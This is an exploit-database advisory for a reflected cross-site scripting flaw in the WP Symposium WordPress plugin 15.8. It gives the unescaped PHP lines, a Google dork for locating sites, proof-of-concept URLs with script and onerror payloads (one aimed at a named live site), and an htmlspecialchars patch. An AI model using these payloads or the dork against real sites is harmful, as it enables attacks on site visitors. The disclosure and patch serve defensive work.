WordPress WP Symposium Plugin Cross Site Scripting

2015.09.03

Credit: Ashiyane Digital Security Team

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: "/wp-content/plugins/wp-symposium/"

######################
# Exploit Title : WordPress WP Symposium Plugin Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Google Dork: inurl:"/wp-content/plugins/wp-symposium/"
# Vendor Homepage : https://wordpress.org/plugins/wp-symposium/
# Date: 2015-09-02
# Tested On : Elementary Os - Firefox
# Software Link : https://downloads.wordpress.org/plugin/wp-symposium.15.8.1.zip
# Version : 15.8
######################
# Vulnerable Code:
# File: get_album_item.php - Line 5,12
5: $size = $_REQUEST['size'];
12: echo 'incorrect size: '.$size;
######################
# POC :
http://[URL]/[PATH]/wp-content/plugins/wp-symposium/get_album_item.php?size=<script>alert(/xss/)</script>
######################
# Live Target :
http://www.wpsyXmposium.com/wp-content/plugins/wp-symposium/get_album_item.php?size="><img src='x' onerror=alert(/xss/)>
######################
# Patch:
# File: get_album_item.php - Line 12
12: echo 'incorrect size: '.htmlspecialchars($size);
######################
# Discovered By : Ehsan Hosseini
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress WP Symposium Plugin Cross Site Scripting

Dork: "/wp-content/plugins/wp-symposium/"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.